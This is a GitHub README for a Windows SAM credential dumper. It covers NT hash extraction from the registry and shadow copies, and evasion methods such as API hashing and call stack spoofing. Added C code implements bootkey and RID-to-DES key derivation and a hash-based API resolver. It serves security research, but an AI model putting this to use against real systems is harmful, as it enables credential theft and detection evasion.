PeterGabaldon/WhatAboutSAM
WhatAboutSAM

⚠️ Disclaimer: Authorized Educational Use Only

This project is intended strictly for cybersecurity education and authorized security research. It may only be used in environments where you have clear, prior, and explicit permission to perform credential and SAM-related testing, such as systems you own or systems covered by a valid authorization agreement.

By no means may this project be used against any system, account, network, or data without prior authorization. Unauthorized use is prohibited and may violate applicable laws, policies, and professional ethics. Users are solely responsible for ensuring that every use of this project is lawful, permitted, and properly scoped.

Introduction

WhatAboutSAM is my custom Windows SAM dumper. It can read SAM material directly from the live registry or from offline hive files exposed through a Volume Shadow Copy (VSS) snapshot. The live registry method needs SYSTEM privileges, because the SAM subkeys under HKLM\SAM are readable only by SYSTEM by default. The Shadow Snapshot method only needs an elevated administrator context, because it reads the SAM and SYSTEM hive files from a VSS snapshot, where neither the registry ACL nor the exclusive lock the kernel holds on the live hive files applies. I wanted to study at a low level how Windows stores local user credentials in the Security Account Manager (SAM). As a Cybersecurity Engineer with a mostly offensive mindset, I have used the tools we all know many times: mimikatz, secretsdump (impacket), pwdump, hashdump (metasploit), crackmapexec (--sam parameter), LaZagne...

Also, I wanted to practice some malware development techniques (enumerated below), and I needed an excuse for it. That is why I decided to implement my own SAM dumper.

It is currently in development.

Please, take a look at the credits because without these projects this would not have been possible.

Sample execution

Characteristics and possibilities

  • Live registry method (-r, --registry): reads the protected SAM and SYSTEM registry material through native ntdll calls rather than the advapi32 Reg* wrappers. This method needs SYSTEM privileges, because HKLM\SAM is readable only by SYSTEM by default.
  • Shadow Snapshot method (-ss, --shadowSnapshot): creates a VSS snapshot of C:\, reads Windows\System32\Config\SAM and Windows\System32\Config\SYSTEM from the snapshot, and parses the offline hives with Offreg.dll. This method needs administrator privileges, not SYSTEM privileges. Keep in mind that the snapshot is an artifact of its own: it remains on the volume until it is deleted.
  • NTLM hash recovery: extracts the local user records (the V values under SAM\Domains\Account\Users), derives the bootkey/syskey and the hashed bootkey from it, and prints the NT hashes for local accounts.
  • SAM format handling: supports the AES-based storage introduced in Windows 10 1607 (Anniversary Update) and includes the legacy RC4-based path for older builds, which still needs more testing.
  • Native API resolution: walks the PEB loader data to find ntdll, then compares hashes of the export names against precomputed hashes, so the binary calls neither GetModuleHandle nor GetProcAddress and carries no plaintext API name strings.
  • Optional call stack spoofing path (-cc, --customCallback): proxies selected native calls through thread-pool callbacks, so the call appears to originate from a system callback rather than directly from the tool's own code.
  • Debug output (-d, --debug): prints detailed acquisition and decryption traces for development and research.
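The decryption chain behind the "NTLM hash recovery" item above is well documented: four class names under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (JD, Skew1, GBG, Data) are decoded from hex and byte-permuted into the 16-byte bootkey; the bootkey is then combined with material from the SAM\Domains\Account F value to obtain the hashed bootkey (MD5 + RC4 on the legacy path, AES-128-CBC on the 1607+ path); finally each user's 16-byte NT hash is unwrapped with two DES keys that depend only on the account's RID. The following is an added example, not code from WhatAboutSAM, that implements the two library-free steps of that chain, the bootkey permutation and the RID-to-DES-key expansion, on constructed inputs. The class names and the RID are made up for the demonstration; the MD5/RC4/AES/DES operations themselves need a crypto library and are described in comments only.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BOOTKEY_LEN 16

/* Fixed permutation applied to the concatenated class-name bytes
   (JD | Skew1 | GBG | Data, 4 bytes each). out[i] = scrambled[PERM[i]]. */
static const uint8_t BOOTKEY_PERM[BOOTKEY_LEN] = {
    0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
    0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7
};

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode the four 8-character hex class names (read in the order JD, Skew1,
   GBG, Data) and permute them into the bootkey. Returns 0 on success,
   -1 if any class name is not exactly 8 hex digits. */
int derive_bootkey(const char *classnames[4], uint8_t out[BOOTKEY_LEN]) {
    uint8_t scrambled[BOOTKEY_LEN];
    for (int k = 0; k < 4; k++) {
        if (strlen(classnames[k]) != 8) return -1;
        for (int i = 0; i < 4; i++) {
            int hi = hexval(classnames[k][2 * i]), lo = hexval(classnames[k][2 * i + 1]);
            if (hi < 0 || lo < 0) return -1;
            scrambled[k * 4 + i] = (uint8_t)((hi << 4) | lo);
        }
    }
    for (int i = 0; i < BOOTKEY_LEN; i++) out[i] = scrambled[BOOTKEY_PERM[i]];
    return 0;
}

/* Spread 7 key bytes over 8 DES key bytes, 7 bits each. The low bit of every
   output byte is the DES parity slot; it is left clear because DES ignores it. */
static void str_to_key(const uint8_t in[7], uint8_t out[8]) {
    out[0] = in[0] >> 1;
    out[1] = (uint8_t)(((in[0] & 0x01) << 6) | (in[1] >> 2));
    out[2] = (uint8_t)(((in[1] & 0x03) << 5) | (in[2] >> 3));
    out[3] = (uint8_t)(((in[2] & 0x07) << 4) | (in[3] >> 4));
    out[4] = (uint8_t)(((in[3] & 0x0F) << 3) | (in[4] >> 5));
    out[5] = (uint8_t)(((in[4] & 0x1F) << 2) | (in[5] >> 6));
    out[6] = (uint8_t)(((in[5] & 0x3F) << 1) | (in[6] >> 7));
    out[7] = in[6] & 0x7F;
    for (int i = 0; i < 8; i++) out[i] = (uint8_t)((out[i] << 1) & 0xFE);
}

/* The two DES keys that wrap a user's NT hash are derived from the RID alone:
   the little-endian RID is repeated into two 7-byte strings with different
   rotations. k1 decrypts hash bytes 0..7, k2 decrypts bytes 8..15. */
void rid_to_des_keys(uint32_t rid, uint8_t k1[8], uint8_t k2[8]) {
    uint8_t r[4] = { (uint8_t)rid, (uint8_t)(rid >> 8), (uint8_t)(rid >> 16), (uint8_t)(rid >> 24) };
    uint8_t s1[7] = { r[0], r[1], r[2], r[3], r[0], r[1], r[2] };
    uint8_t s2[7] = { r[3], r[0], r[1], r[2], r[3], r[0], r[1] };
    str_to_key(s1, k1);
    str_to_key(s2, k2);
}

static void print_hex(const char *label, const uint8_t *p, size_t n) {
    printf("%s", label);
    for (size_t i = 0; i < n; i++) printf("%02x", p[i]);
    printf("\n");
}

int main(void) {
    /* Constructed class names, not from a real SYSTEM hive, in the order JD, Skew1, GBG, Data. */
    const char *classnames[4] = { "00112233", "44556677", "8899aabb", "ccddeeff" };
    uint8_t bootkey[BOOTKEY_LEN], k1[8], k2[8];
    if (derive_bootkey(classnames, bootkey) != 0) { fputs("malformed class name\n", stderr); return 1; }
    print_hex("bootkey           : ", bootkey, BOOTKEY_LEN);
    /* Next (not shown): hashed bootkey from the SAM F value, then per-user AES (1607+) or RC4. */
    rid_to_des_keys(500, k1, k2);   /* 500 = built-in Administrator RID */
    print_hex("DES k1 for RID 500: ", k1, 8);
    print_hex("DES k2 for RID 500: ", k2, 8);
    return 0;
}
```

Two checks worth keeping when porting this into a real dumper: reject class names that are not exactly 8 hex digits (a failed hive read otherwise produces a plausible-looking but useless bootkey), and remember that the RID-derived DES keys are the same on every machine, so a wrong hash after decryption almost always means the hashed bootkey, not this step, is wrong.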

TODO List

  • PEB Walking (avoid GetModuleHandle + GetProcAddress)
  • Call Stack Spoofing with Custom Callbacks (Thread Pools)
  • Native Functions
  • API Hashing
  • Travis CI (finally done with GitHub Actions)
  • Debug Branch vs Release Branch
  • Shadow Snapshot Method
  • Test old algorithm. What a bummer: Microsoft changed SAM storage in Windows 10 1607 (Anniversary Update)
  • Command Line Parameters
  • Add more comments :)
  • Debug prints
  • Add optional SYSTEM elevation for the live registry method
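The "PEB Walking" and "API Hashing" items above describe one mechanism: instead of calling GetModuleHandle/GetProcAddress with a plaintext name, the loader walks PEB->Ldr->InMemoryOrderModuleList to find ntdll's base, reads its IMAGE_EXPORT_DIRECTORY, and hashes every export name until one matches a constant compiled into the binary. The following is an added example, not WhatAboutSAM's own code, of that lookup. It assumes djb2 as the hash function (the page does not say which hash the project uses) and uses a constructed byte buffer laid out like a PE export directory, with out-of-order ordinals so that the name-index-to-ordinal indirection is exercised; the PEB walk itself is Windows-only and is only described in comments, so the block runs on any platform.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Trimmed IMAGE_EXPORT_DIRECTORY: only the fields the resolver needs. All are RVAs from the module base. */
typedef struct {
    uint32_t NumberOfNames;
    uint32_t AddressOfFunctions;    /* uint32_t[]: function RVAs, indexed by ordinal */
    uint32_t AddressOfNames;        /* uint32_t[]: RVAs of NUL-terminated ASCII export names */
    uint32_t AddressOfNameOrdinals; /* uint16_t[]: name index -> ordinal */
} export_dir_t;

/* djb2 over the export name (assumed hash; the project's choice is not on the page).
   In a real build the wanted value is a precomputed literal, so the name never appears as a string. */
uint32_t api_hash(const char *name) {
    uint32_t h = 5381;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        h = h * 33u + *p;
    return h;
}

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }

/* Hash each exported name and map the first match through the ordinal table to
   its function RVA. Returns 0 if no export hashes to `wanted`. On Windows, `base`
   comes from the PEB loader list and `dir` from the PE optional header's
   IMAGE_DIRECTORY_ENTRY_EXPORT; neither GetModuleHandle nor GetProcAddress is involved. */
uint32_t resolve_rva(const uint8_t *base, const export_dir_t *dir, uint32_t wanted) {
    for (uint32_t i = 0; i < dir->NumberOfNames; i++) {
        const char *name = (const char *)(base + rd32(base + dir->AddressOfNames + 4 * i));
        if (api_hash(name) != wanted) continue;
        uint16_t ord = rd16(base + dir->AddressOfNameOrdinals + 2 * i);
        return rd32(base + dir->AddressOfFunctions + 4 * ord);
    }
    return 0;
}

/* Constructed stand-in for a loaded ntdll image (not read from a real module):
   five export names in sorted order, as the linker emits them, deliberately
   unordered ordinals, and fake function RVAs 0x10000 + 0x40 * ordinal.
   `img` must be at least 512 bytes; otherwise the directory is left empty. */
void build_sample_image(uint8_t *img, size_t len, export_dir_t *dir) {
    static const char *const names[] = { "NtClose", "NtEnumerateKey", "NtOpenKey", "NtQueryKey", "NtQueryValueKey" };
    static const uint16_t ords[]     = { 2, 0, 3, 1, 4 };
    enum { N = 5, NAMES_RVA = 0x40, ORDS_RVA = 0x60, FUNCS_RVA = 0x80, STR_RVA = 0x100 };
    memset(dir, 0, sizeof *dir);
    if (len < 512) return;
    memset(img, 0, len);
    uint32_t str = STR_RVA;
    for (uint32_t i = 0; i < N; i++) {
        size_t l = strlen(names[i]) + 1;
        memcpy(img + str, names[i], l);
        memcpy(img + NAMES_RVA + 4 * i, &str, 4);
        memcpy(img + ORDS_RVA + 2 * i, &ords[i], 2);
        uint32_t fn = 0x10000u + 0x40u * ords[i];
        memcpy(img + FUNCS_RVA + 4 * ords[i], &fn, 4);
        str += (uint32_t)l;
    }
    dir->NumberOfNames = N;
    dir->AddressOfFunctions = FUNCS_RVA;
    dir->AddressOfNames = NAMES_RVA;
    dir->AddressOfNameOrdinals = ORDS_RVA;
}

int main(void) {
    uint8_t img[512];
    export_dir_t dir;
    build_sample_image(img, sizeof img, &dir);
    uint32_t h_ntopenkey = api_hash("NtOpenKey");   /* a precomputed literal in a real resolver */
    printf("NtOpenKey -> RVA 0x%x\n", resolve_rva(img, &dir, h_ntopenkey));
    printf("unknown   -> RVA 0x%x\n", resolve_rva(img, &dir, api_hash("NtQueryInformationProcess")));
    return 0;
}
```

Two caveats a resolver like this needs in practice: check at build time that the chosen hash has no collisions across the whole export table of the target module (the loop returns the first match, so a collision silently resolves the wrong function), and, when the same code is pointed at modules other than ntdll, detect forwarded exports, whose function RVA points back inside the export directory at a "DLL.Function" string rather than at code.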

Credits

Please take a look at these projects; without them I could not have developed WhatAboutSAM.
